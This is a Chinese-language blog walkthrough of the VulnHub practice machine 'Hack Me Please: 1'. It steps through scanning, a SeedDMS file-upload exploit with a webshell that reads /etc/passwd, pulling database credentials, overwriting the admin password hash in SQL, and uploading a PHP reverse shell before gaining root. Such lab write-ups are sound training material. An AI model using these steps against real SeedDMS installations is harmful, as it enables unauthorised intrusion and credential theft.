-
vulnhub刷题记录(Hack Me Please: 1)
- 英文名称:Hack Me Please: 1
- 中文名称:请黑我:1
- 发布日期:2021 年 7 月 31 日
- 难度:容易
- 描述:一个完全为 OSCP 制作的简单盒子。不需要蛮力。目标:获取root shell
- 下载地址:
https://www.vulnhub.com/entry/hack-me-please-1,731/
1、开机(Ubuntu_CTF)
开机 2、主机发现(192.168.199.109)
主机发现 3、端口扫描(80、3306)
端口扫描 4、web首页
- Most hackers are young because young people tend to be adaptable. As long as you remain adaptable, you can always be a good hacker."
- -Emmanuel Goldstein
- 大多数黑客都很年轻,因为年轻人往往适应能力强。 只要你保持适应能力,你就永远可以成为一名优秀的黑客。
- ——伊曼纽尔·戈德斯坦
web首页 5、查看源代码,在js注释中找到线索
查看源代码 6、访问页面
访问页面 7、查找漏洞
searchsploit SeedDMS
查找漏洞 8、查看漏洞简介
发现需要登录之后,才能利用文件上传漏洞
- ─# find / -name "47022.txt" 2>/dev/null
- /usr/share/exploitdb/exploits/php/webapps/47022.txt
- Step 1: Login to the application and under any folder add a document.
- 登录到应用程序并在任何文件夹下添加一个文档。
- Step 2: Choose the document as a simple php backdoor file or any backdoor/webshell could be used.
- 选择文档作为简单的 php 后门文件,或者可以使用任何后门/webshell。
- Step 3: Now after uploading the file check the document id corresponding to the document.
- 现在上传文件后检查与文档对应的文档ID。
- Step 4: Now go to example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd to get the command response in browser.
- 现在转到 example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd 以在浏览器中获取命令响应。
- Note: Here "data" and "1048576" are default folders where the uploaded files are getting saved.
- 注意:这里的“data”和“1048576”是保存上传文件的默认文件夹。
9、在conf/settings.xml中发现mysql的用户名密码
- dbDatabase="seeddms"
- dbUser="seeddms"
- dbPass="seeddms"
conf 目录 10、登录mysql,查看web的用户名密码,发现登录不成功
- use seeddms;
- show tables;
- select * from users;
- +-------------+---------------------+--------------------+-----------------+
- | Employee_id | Employee_first_name | Employee_last_name | Employee_passwd |
- +-------------+---------------------+--------------------+-----------------+
- | 1 | saket | saurav | Saket@#$1337 |
- +-------------+---------------------+--------------------+-----------------+
查看users表 11、继续查看 tblUsers 表,找到admin的pwd
admin密码 12、在线破解md5[1],快如闪电(undefined应该是解密失败,尴尬),发现还是无法登录
undefined
破解md5 13、篡改md5值
- └─# echo -n 'ailx10'|md5sum|cut -d ' ' -f1
- 83b70504e0d8742dd5b66e6962eb8a35
- update tblUsers set pwd="83b70504e0d8742dd5b66e6962eb8a35" where login="admin";
- select login,pwd from tblUsers;
篡改md5 14、继续登录
密码正确 15、上传反弹shell
使用kali自带的php反弹shell脚本,使用kali自带的php反弹shell脚本,使用kali自带的php反弹shell脚本
- └─# find / -name "php-reverse-shell.php" 2>/dev/null
- /usr/share/laudanum/php/php-reverse-shell.php
- /usr/share/laudanum/wordpress/templates/php-reverse-shell.php
- /tmp/mozilla_ailx100/php-reverse-shell.php
kali自带的php反弹shell脚本 
修改IP地址和端口 
上传成功 16、本地监听,再点击web页面的反弹shell
反弹成功 
最后文件名会被修改成 1.php 17、切换用户,使用users表中的用户名密码,sudo获得root权限
- select * from users;
- +-------------+---------------------+--------------------+-----------------+
- | Employee_id | Employee_first_name | Employee_last_name | Employee_passwd |
- +-------------+---------------------+--------------------+-----------------+
- | 1 | saket | saurav | Saket@#$1337 |
- +-------------+---------------------+--------------------+-----------------+
获得root权限 到此,实验完成~
-
相关阅读:
Dubbo消费端调用全过程实现分析-负载均衡与集群容错
6_显示登录信息以及上传图片
后端接口对接注意事项
2-3-4树【数据结构与算法java】
java-net-php-python-ssm担保系统客户管理计算机毕业设计程序
SQL优化复习
创新洞察|为什么中国企业更擅长用户导向创新
好奇喵 | PT(Private Tracker)——什么是P2P,什么是BT,啥子是PT?
【科普】RPA技术架构:3大组成部分
【附源码】计算机毕业设计JAVA超市自助结账系统的设计与实现
- 原文地址:https://blog.csdn.net/admin_gt/article/details/126556810